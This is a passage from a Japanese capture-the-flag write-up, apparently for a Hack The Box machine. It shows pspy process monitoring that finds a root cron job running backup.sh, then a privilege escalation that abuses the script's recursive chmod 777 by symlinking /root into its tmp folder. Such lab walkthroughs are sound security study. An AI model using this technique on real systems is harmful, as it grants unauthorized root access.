2020/04/11 10:45:54 CMD: UID=33   PID=845    | /usr/sbin/apache2 -k start
2020/04/11 10:45:54 CMD: UID=33   PID=844    | /usr/sbin/apache2 -k start
2020/04/11 10:45:54 CMD: UID=33   PID=843    | /usr/sbin/apache2 -k start
2020/04/11 10:45:54 CMD: UID=33   PID=842    | /usr/sbin/apache2 -k start
2020/04/11 10:45:54 CMD: UID=33   PID=841    | /usr/sbin/apache2 -k start
2020/04/11 10:45:54 CMD: UID=0    PID=838    | /usr/sbin/apache2 -k start
2020/04/11 10:45:54 CMD: UID=0    PID=8      |
2020/04/11 10:45:54 CMD: UID=107  PID=710    | /usr/sbin/mysqld
2020/04/11 10:45:54 CMD: UID=0    PID=7      |
2020/04/11 10:45:54 CMD: UID=0    PID=551    | /sbin/agetty --noclear tty1 linux
2020/04/11 10:45:54 CMD: UID=0    PID=5      |
2020/04/11 10:45:54 CMD: UID=0    PID=422    | /usr/sbin/rsyslogd -n
2020/04/11 10:45:54 CMD: UID=0    PID=421    | /lib/systemd/systemd-logind
2020/04/11 10:45:54 CMD: UID=0    PID=42     |
2020/04/11 10:45:54 CMD: UID=105  PID=414    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
2020/04/11 10:45:54 CMD: UID=0    PID=413    | /usr/bin/VGAuthService
2020/04/11 10:45:54 CMD: UID=0    PID=412    | /usr/sbin/cron -f
2020/04/11 10:45:54 CMD: UID=0    PID=41     |
2020/04/11 10:45:54 CMD: UID=100  PID=402    | /lib/systemd/systemd-timesyncd
2020/04/11 10:45:54 CMD: UID=0    PID=3      |
2020/04/11 10:45:54 CMD: UID=0    PID=299    |
2020/04/11 10:45:54 CMD: UID=0    PID=29     |
2020/04/11 10:45:54 CMD: UID=0    PID=28     |
2020/04/11 10:45:54 CMD: UID=0    PID=27     |
2020/04/11 10:45:54 CMD: UID=0    PID=26     |
2020/04/11 10:45:54 CMD: UID=0    PID=25     |
2020/04/11 10:45:54 CMD: UID=0    PID=24     |
2020/04/11 10:45:54 CMD: UID=0    PID=23     |
2020/04/11 10:45:54 CMD: UID=0    PID=229    | /lib/systemd/systemd-udevd
2020/04/11 10:45:54 CMD: UID=0    PID=22     |
2020/04/11 10:45:54 CMD: UID=0    PID=21     |
2020/04/11 10:45:54 CMD: UID=0    PID=202    |
2020/04/11 10:45:54 CMD: UID=0    PID=201    | /usr/bin/vmtoolsd
2020/04/11 10:45:54 CMD: UID=0    PID=2      |
2020/04/11 10:45:54 CMD: UID=0    PID=199    | /lib/systemd/systemd-journald
2020/04/11 10:45:54 CMD: UID=0    PID=19     |
2020/04/11 10:45:54 CMD: UID=0    PID=18     |
2020/04/11 10:45:54 CMD: UID=0    PID=175    |
2020/04/11 10:45:54 CMD: UID=0    PID=174    |
2020/04/11 10:45:54 CMD: UID=0    PID=17     |
2020/04/11 10:45:54 CMD: UID=0    PID=16     |
2020/04/11 10:45:54 CMD: UID=0    PID=15     |
2020/04/11 10:45:54 CMD: UID=0    PID=140    |
2020/04/11 10:45:54 CMD: UID=0    PID=14     |
2020/04/11 10:45:54 CMD: UID=0    PID=138    |
2020/04/11 10:45:54 CMD: UID=0    PID=13     |
2020/04/11 10:45:54 CMD: UID=1000 PID=1291   | ./pspy64
2020/04/11 10:45:54 CMD: UID=0    PID=126    |
2020/04/11 10:45:54 CMD: UID=0    PID=1258   |
2020/04/11 10:45:54 CMD: UID=0    PID=124    |
2020/04/11 10:45:54 CMD: UID=0    PID=1227   |
2020/04/11 10:45:54 CMD: UID=0    PID=122    |
2020/04/11 10:45:54 CMD: UID=0    PID=120    |
2020/04/11 10:45:54 CMD: UID=0    PID=12     |
2020/04/11 10:45:54 CMD: UID=0    PID=118    |
2020/04/11 10:45:54 CMD: UID=0    PID=117    |
2020/04/11 10:45:54 CMD: UID=0    PID=1151   |
2020/04/11 10:45:54 CMD: UID=0    PID=115    |
2020/04/11 10:45:54 CMD: UID=0    PID=114    |
2020/04/11 10:45:54 CMD: UID=0    PID=1102   |
2020/04/11 10:45:54 CMD: UID=0    PID=11     |
2020/04/11 10:45:54 CMD: UID=0    PID=10     |
2020/04/11 10:45:54 CMD: UID=0    PID=1      | /sbin/init
2020/04/11 10:46:01 CMD: UID=0    PID=1299   | /usr/sbin/CRON -f
2020/04/11 10:46:01 CMD: UID=0    PID=1300   | /usr/sbin/CRON -f
2020/04/11 10:46:01 CMD: UID=0    PID=1301   | /bin/sh -c /usr/bin/backup.sh
2020/04/11 10:46:01 CMD: UID=0    PID=1302   | /bin/bash /usr/bin/backup.sh
2020/04/11 10:46:01 CMD: UID=0    PID=1304   | /bin/sh -c gzip
2020/04/11 10:46:01 CMD: UID=0    PID=1303   | /bin/sh -c gzip
2020/04/11 10:46:01 CMD: UID=0    PID=1305   | /bin/bash /usr/bin/backup.sh
2020/04/11 10:46:01 CMD: UID=0    PID=1306   | tar -xf backup_courses.tar.gz
2020/04/11 10:46:01 CMD: UID=0    PID=1307   | /bin/bash /usr/bin/backup.sh

案の定 /usr/bin/backup.sh が実行されていますね

/usr/bin/backup.sh を調べる

[email protected]:/usr/bin$ cat backup.sh
cat backup.sh

## !/bin/bash
cd /home/giovanni/work;
tar -czvf tmp/backup_courses.tar.gz courses/*;
cd tmp;
tar -xf backup_courses.tar.gz;
chmod 777 * -R;

中身はこんな感じです

良くあるパターンとしては backup.sh が writeable で書き換えて root に実行させるという感じなのですが、writeable ではありませんでした。

ここで良く見るべきは最後の chmod 777 * -R; ですね。これで tmp 内の全てのファイルの権限を変更しています。

なので、ln コマンドで tmp 内に/root と link したファイルを作ります

[email protected]:~/work/tmp$ ln -s /root hoge
ln -s /root hoge

これで cronjob が実行されるのを少し待ちます

すると

drwxrwxrwx  3 root root  4096 Nov  4  2018 root

権限が変更されたのでこれで root.txt を取れます

終わりに

かなりボリューミーな machine で楽しかったです!

色々自力では気づけなかった部分もあるので精進します…!

このエントリーをはてなブックマークに追加